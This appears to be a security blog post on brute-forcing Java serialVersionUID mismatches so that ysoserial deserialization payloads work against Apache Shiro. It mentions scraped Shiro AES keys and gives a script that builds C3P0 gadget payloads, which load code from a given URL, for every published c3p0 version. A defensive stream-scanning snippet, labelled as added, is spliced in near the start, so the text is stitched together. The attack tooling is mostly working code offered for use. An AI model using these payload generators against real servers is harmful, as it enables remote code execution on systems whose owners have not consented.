Generating every deserialization payload via serialVersionUID

Introduction

I recently ran into a deserialization vulnerability in an old Shiro version, but it only worked when using URLDNS; apart from CommonsCollections, which does not work on Shiro anyway, the other gadgets all failed as well, so I suspected the SUID was to blame.
When Java deserializes a byte stream, an exception is thrown if the serialVersionUID in the stream differs from the serialVersionUID of the corresponding class on the target server.
If the target prints the exception message and thereby leaks its SUID, this is easy to resolve.
In the usual case, however, the target server prints no exception message.
A differing SUID is almost always caused by a different jar version: when serialVersionUID is not explicitly declared, it is derived by computeDefaultSUID, and different jar versions may contain different methods, so the computed SUID differs.
When no exception message is printed, the SUID of the target's jar is unknown, so the only option is to generate deserialization payloads with every possible SUID and try them one by one.
The approach here is therefore to fetch every published version of the jar and invoke each of them to generate a payload.
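As an added illustration, not part of the original post, the Python below walks a captured Java serialization stream, reports the class name and serialVersionUID of every class descriptor, and compares them with the SUIDs of the classes actually deployed. The sample stream is constructed inline and abbreviated (field descriptors omitted); a mismatch is exactly what makes ObjectInputStream throw InvalidClassException, so a burst of those in application logs is the signal a defender should watch for.

```python
import re
import struct

# Java serialization stream constants (java.io.ObjectStreamConstants)
STREAM_MAGIC = b'\xac\xed\x00\x05'
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
# class names are dotted ASCII identifiers, possibly array descriptors such as "[Ljava.lang.Object;"
NAME_RE = re.compile(r'[A-Za-z_$\[][\w$.;\[]*')


def scan_class_descs(stream):
    """Return [(class_name, serialVersionUID), ...] for each TC_CLASSDESC in the stream.
    A descriptor starts with 0x72, a 2-byte length plus the class name, then the 8-byte
    big-endian signed SUID; matching only that prefix is enough for triage and does not
    require knowing the gadget's field layout."""
    found, i = [], 0
    while i < len(stream):
        if stream[i] == TC_CLASSDESC and i + 3 <= len(stream):
            n = struct.unpack('>H', stream[i + 1:i + 3])[0]
            end = i + 3 + n + 8
            if n > 0 and end <= len(stream):
                name = stream[i + 3:i + 3 + n].decode('ascii', 'replace')
                if NAME_RE.fullmatch(name):
                    suid = struct.unpack('>q', stream[i + 3 + n:end])[0]
                    found.append((name, suid))
                    i = end  # skip past the SUID so its bytes are not rescanned
                    continue
        i += 1
    return found


def suid_mismatches(stream, deployed):
    """(class, suid_in_stream, suid_deployed) for every class where the stream disagrees
    with `deployed` ({class_name: suid} of the jars on the target)."""
    return [(name, suid, deployed[name]) for name, suid in scan_class_descs(stream)
            if name in deployed and deployed[name] != suid]


def class_desc(name, suid):
    """Constructed, abbreviated TC_CLASSDESC: flags, zero fields, no superclass."""
    enc = name.encode('ascii')
    return (bytes([TC_CLASSDESC]) + struct.pack('>H', len(enc)) + enc
            + struct.pack('>q', suid) + b'\x03\x00\x00' + bytes([TC_ENDBLOCKDATA, TC_NULL]))


# Constructed sample: a stream referencing HashMap and URL with the SUIDs the JDK declares
# explicitly, which is consistent with the post's observation that only URLDNS worked.
SAMPLE = (STREAM_MAGIC + bytes([TC_OBJECT]) + class_desc('java.util.HashMap', 362498820763181265)
          + bytes([TC_OBJECT]) + class_desc('java.net.URL', -7627629688361524110))
```

Run suid_mismatches against a captured stream with the SUIDs of the jars a server actually ships; any non-empty result explains a silent deserialization failure without needing the server's exception output.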

Shiro AES key

A Shiro deserialization payload is base64-decoded and AES-decrypted before it is deserialized.
Old Shiro versions hardcoded a default AES key, which is what caused the problem, but in practice the key encountered is often not the default one. A lot of code is copy-pasted and tweaked, though, so I scraped some of the more commonly used keys from GitHub.


Generate payload

Ysoserial is a Maven project; after cloning it from GitHub, build it first.
git clone https://github.com/frohoff/ysoserial
mvn compile
mvn compile builds the project and downloads the jars it depends on; the compiled bytecode ends up in the target directory.
Loading a different jar version is done by modifying the classpath:
when two versions of the same jar are on the classpath, the one listed first is the one the project actually uses.
So when modifying the classpath, the jar whose version is being swapped is placed at the very front, overriding the jar that ysoserial ships with.
I wrote a rough little script that barely works.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import os
import requests
from subprocess import Popen, PIPE
from xml.dom.minidom import parseString

# Maven metadata listing every published version of the library whose SUID varies
repo_url = "http://uk.maven.org/maven2/com/mchange/c3p0/maven-metadata.xml"
mvn_home = "/Users/yulegeyu/.m2/repository"   # local Maven repository
yso_path = "/tmp/ysoserial/target/classes"     # output of `mvn compile` in the ysoserial checkout
gadget = "C3P0"
# the trailing "| base64" is interpreted by the shell in os.system and base64-encodes the payload
command = "http://www.baidu.com | base64"

res = requests.get(repo_url)
root = parseString(res.content.decode("utf-8"))

groupId = root.getElementsByTagName("groupId")[0].firstChild.data
artifactId = root.getElementsByTagName("artifactId")[0].firstChild.data

for i in root.getElementsByTagName("version"):
    version = i.firstChild.data
    if version.find('-pre') > -1:
        continue
    # path where `mvn dependency:get` stores this version of the jar in the local repository
    jar_path = mvn_home + '/' + groupId.replace('.', '/') + '/' + artifactId + '/' + version + '/' + artifactId + '-' + version + '.jar'
    cmd = "mvn dependency:get -DremoteRepositories=http://repo1.maven.org/maven2/ -DgroupId=%s -DartifactId=%s -Dversion=%s" \
        % (groupId, artifactId, version)
    child = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
    child.wait()

    # classpath order matters: ysoserial classes ({0}), then the jar version under test ({2}) so it
    # shadows the same artifact listed later, then every other ysoserial dependency ({1} = mvn_home)
    cmd2 = "java -cp {0}:{2}:{1}/net/iharder/base64/2.3.9/base64-2.3.9.jar:{1}/commons-io/commons-io/2.6/commons-io-2.6.jar:{1}/org/reflections/reflections/0.9.9/reflections-0.9.9.jar:{1}/com/google/guava/guava/15.0/guava-15.0.jar:{1}/com/google/code/findbugs/annotations/2.0.1/annotations-2.0.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api/2.1.1/shrinkwrap-resolver-api-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi/2.1.1/shrinkwrap-resolver-spi-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api-maven/2.1.1/shrinkwrap-resolver-api-maven-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi-maven/2.1.1/shrinkwrap-resolver-spi-maven-2.1.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-api-maven-archive/2.1.1/shrinkwrap-resolver-api-maven-archive-2.1.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-api/1.2.1/shrinkwrap-api-1.2.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-impl-maven/2.1.1/shrinkwrap-resolver-impl-maven-2.1.1.jar:{1}/org/eclipse/aether/aether-api/0.9.0.M2/aether-api-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-impl/0.9.0.M2/aether-impl-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-spi/0.9.0.M2/aether-spi-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-util/0.9.0.M2/aether-util-0.9.0.M2.jar:{1}/org/eclipse/aether/aether-connector-wagon/0.9.0.M2/aether-connector-wagon-0.9.0.M2.jar:{1}/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.jar:{1}/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.jar:{1}/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.jar:{1}/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:{1}/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.jar:{1}/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.jar:{1}/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.jar:{1}/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.jar:{1}/org/codehaus/plexus/plexus-utils/3.0.15/plexus-utils-3.0.15.jar:{1}/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar:{1}/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar:{1}/org/apache/maven/wagon/wagon-provider-api/2.6/wagon-provider-api-2.6.jar:{1}/org/apache/maven/wagon/wagon-file/2.6/wagon-file-2.6.jar:{1}/org/apache/maven/wagon/wagon-http-lightweight/2.6/wagon-http-lightweight-2.6.jar:{1}/org/apache/maven/wagon/wagon-http-shared/2.6/wagon-http-shared-2.6.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-impl-maven-archive/2.1.1/shrinkwrap-resolver-impl-maven-archive-2.1.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-impl-base/1.2.1/shrinkwrap-impl-base-1.2.1.jar:{1}/org/jboss/shrinkwrap/shrinkwrap-spi/1.2.1/shrinkwrap-spi-1.2.1.jar:{1}/org/jboss/shrinkwrap/resolver/shrinkwrap-resolver-spi-maven-archive/2.1.1/shrinkwrap-resolver-spi-maven-archive-2.1.1.jar:{1}/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.jar:{1}/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0-no_aop.jar:{1}/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.jar:{1}/org/codehaus/plexus/plexus-compiler-javac/2.3/plexus-compiler-javac-2.3.jar:{1}/org/codehaus/plexus/plexus-compiler-api/2.3/plexus-compiler-api-2.3.jar:{1}/org/javassist/javassist/3.19.0-GA/javassist-3.19.0-GA.jar:{1}/commons-codec/commons-codec/1.9/commons-codec-1.9.jar:{1}/org/jenkins-ci/main/remoting/2.55/remoting-2.55.jar:{1}/org/jenkins-ci/constant-pool-scanner/1.2/constant-pool-scanner-1.2.jar:{1}/org/jboss/logging/jboss-logging/3.3.0.Final/jboss-logging-3.3.0.Final.jar:{1}/org/jboss/remoting/jboss-remoting/4.0.19.Final/jboss-remoting-4.0.19.Final.jar:{1}/org/jboss/xnio/xnio-api/3.3.4.Final/xnio-api-3.3.4.Final.jar:{1}/org/jboss/jboss-common-core/2.5.0.Final/jboss-common-core-2.5.0.Final.jar:{1}/org/jboss/xnio/xnio-nio/3.3.4.Final/xnio-nio-3.3.4.Final.jar:{1}/org/jboss/sasl/jboss-sasl/1.0.5.Final/jboss-sasl-1.0.5.Final.jar:{1}/org/jboss/remotingjmx/remoting-jmx/2.0.1.Final/remoting-jmx-2.0.1.Final.jar:{1}/org/jboss/logging/jboss-logging-processor/1.2.0.Final/jboss-logging-processor-1.2.0.Final.jar:{1}/org/jboss/jdeparser/jdeparser/1.0.0.Final/jdeparser-1.0.0.Final.jar:{1}/org/jboss/marshalling/jboss-marshalling/1.4.10.Final/jboss-marshalling-1.4.10.Final.jar:{1}/org/jboss/marshalling/jboss-marshalling-river/1.4.10.Final/jboss-marshalling-river-1.4.10.Final.jar:{1}/commons-collections/commons-collections/3.1/commons-collections-3.1.jar:{1}/org/beanshell/bsh/2.0b5/bsh-2.0b5.jar:{1}/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar:{1}/commons-logging/commons-logging/1.1.1/commons-logging-1.1.1.jar:{1}/org/apache/commons/commons-collections4/4.0/commons-collections4-4.0.jar:{1}/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar:{1}/org/springframework/spring-core/4.1.4.RELEASE/spring-core-4.1.4.RELEASE.jar:{1}/org/springframework/spring-beans/4.1.4.RELEASE/spring-beans-4.1.4.RELEASE.jar:{1}/org/hibernate/hibernate-core/4.3.11.Final/hibernate-core-4.3.11.Final.jar:{1}/org/jboss/logging/jboss-logging-annotations/1.2.0.Beta1/jboss-logging-annotations-1.2.0.Beta1.jar:{1}/org/jboss/spec/javax/transaction/jboss-transaction-api_1.2_spec/1.0.0.Final/jboss-transaction-api_1.2_spec-1.0.0.Final.jar:{1}/dom4j/dom4j/1.6.1/dom4j-1.6.1.jar:{1}/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar:{1}/org/hibernate/common/hibernate-commons-annotations/4.0.5.Final/hibernate-commons-annotations-4.0.5.Final.jar:{1}/org/hibernate/javax/persistence/hibernate-jpa-2.1-api/1.0.0.Final/hibernate-jpa-2.1-api-1.0.0.Final.jar:{1}/antlr/antlr/2.7.7/antlr-2.7.7.jar:{1}/org/jboss/jandex/1.1.0.Final/jandex-1.1.0.Final.jar:{1}/org/springframework/spring-aop/4.1.4.RELEASE/spring-aop-4.1.4.RELEASE.jar:{1}/aopalliance/aopalliance/1.0/aopalliance-1.0.jar:{1}/net/sf/json-lib/json-lib/2.4/json-lib-2.4-jdk15.jar:{1}/commons-lang/commons-lang/2.5/commons-lang-2.5.jar:{1}/net/sf/ezmorph/ezmorph/1.0.6/ezmorph-1.0.6.jar:{1}/commons-fileupload/commons-fileupload/1.3/commons-fileupload-1.3.jar:{1}/org/apache/wicket/wicket-util/6.23.0/wicket-util-6.23.0.jar:{1}/org/apache/shiro/shiro-core/1.4.0/shiro-core-1.4.0.jar:{1}/org/apache/shiro/shiro-lang/1.4.0/shiro-lang-1.4.0.jar:{1}/org/apache/shiro/shiro-cache/1.4.0/shiro-cache-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-hash/1.4.0/shiro-crypto-hash-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-core/1.4.0/shiro-crypto-core-1.4.0.jar:{1}/org/apache/shiro/shiro-crypto-cipher/1.4.0/shiro-crypto-cipher-1.4.0.jar:{1}/org/apache/shiro/shiro-config-core/1.4.0/shiro-config-core-1.4.0.jar:{1}/org/apache/shiro/shiro-config-ogdl/1.4.0/shiro-config-ogdl-1.4.0.jar:{1}/org/apache/shiro/shiro-event/1.4.0/shiro-event-1.4.0.jar:{1}/com/mchange/c3p0/0.9.5.2/c3p0-0.9.5.2.jar:{1}/com/mchange/mchange-commons-java/0.2.11/mchange-commons-java-0.2.11.jar:{1}/javax/servlet/javax.servlet-api/3.1.0/javax.servlet-api-3.1.0.jar:{1}/org/apache/myfaces/core/myfaces-impl/2.2.9/myfaces-impl-2.2.9.jar:{1}/org/apache/myfaces/core/myfaces-api/2.2.9/myfaces-api-2.2.9.jar:{1}/org/apache/geronimo/specs/geronimo-atinject_1.0_spec/1.0/geronimo-atinject_1.0_spec-1.0.jar:{1}/commons-digester/commons-digester/1.8/commons-digester-1.8.jar:{1}/xalan/xalan/2.7.2/xalan-2.7.2.jar:{1}/xalan/serializer/2.7.2/serializer-2.7.2.jar:{1}/rome/rome/1.0/rome-1.0.jar:{1}/jdom/jdom/1.0/jdom-1.0.jar:{1}/org/python/jython-standalone/2.5.2/jython-standalone-2.5.2.jar:{1}/rhino/js/1.7R2/js-1.7R2.jar:{1}/javassist/javassist/3.12.0.GA/javassist-3.12.0.GA.jar:{1}/org/jboss/weld/weld-core/1.1.33.Final/weld-core-1.1.33.Final.jar:{1}/org/jboss/weld/weld-api/1.1.Final/weld-api-1.1.Final.jar:{1}/org/jboss/weld/weld-spi/1.1.Final/weld-spi-1.1.Final.jar:{1}/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:{1}/org/jboss/spec/javax/interceptor/jboss-interceptors-api_1.1_spec/1.0.0.Beta1/jboss-interceptors-api_1.1_spec-1.0.0.Beta1.jar:{1}/org/slf4j/slf4j-ext/1.7.2/slf4j-ext-1.7.2.jar:{1}/ch/qos/cal10n/cal10n-api/0.7.7/cal10n-api-0.7.7.jar:{1}/org/jboss/interceptor/jboss-interceptor-core/2.0.0.Final/jboss-interceptor-core-2.0.0.Final.jar:{1}/org/jboss/interceptor/jboss-interceptor-spi/2.0.0.Final/jboss-interceptor-spi-2.0.0.Final.jar:{1}/javax/enterprise/cdi-api/1.0-SP1/cdi-api-1.0-SP1.jar:{1}/org/jboss/interceptor/jboss-interceptor-api/1.1/jboss-interceptor-api-1.1.jar:{1}/javax/inject/javax.inject/1/javax.inject-1.jar:{1}/javax/interceptor/javax.interceptor-api/3.1/javax.interceptor-api-3.1.jar:{1}/org/slf4j/slf4j-api/1.7.21/slf4j-api-1.7.21.jar:{1}/org/clojure/clojure/1.8.0/clojure-1.8.0.jar:{1}/com/vaadin/vaadin-server/7.7.14/vaadin-server-7.7.14.jar:{1}/com/vaadin/vaadin-sass-compiler/0.9.13/vaadin-sass-compiler-0.9.13.jar:{1}/org/w3c/css/sac/1.3/sac-1.3.jar:{1}/com/vaadin/external/flute/flute/1.3.0.gg2/flute-1.3.0.gg2.jar:{1}/com/vaadin/vaadin-shared/7.7.14/vaadin-shared-7.7.14.jar:{1}/org/jsoup/jsoup/1.8.3/jsoup-1.8.3.jar:{1}/org/mortbay/jasper/apache-el/8.0.27/apache-el-8.0.27.jar" \
           " ysoserial.GeneratePayload {3} {4}".format(yso_path, mvn_home, jar_path, gadget, command)
    print(version)
    os.system(cmd2)
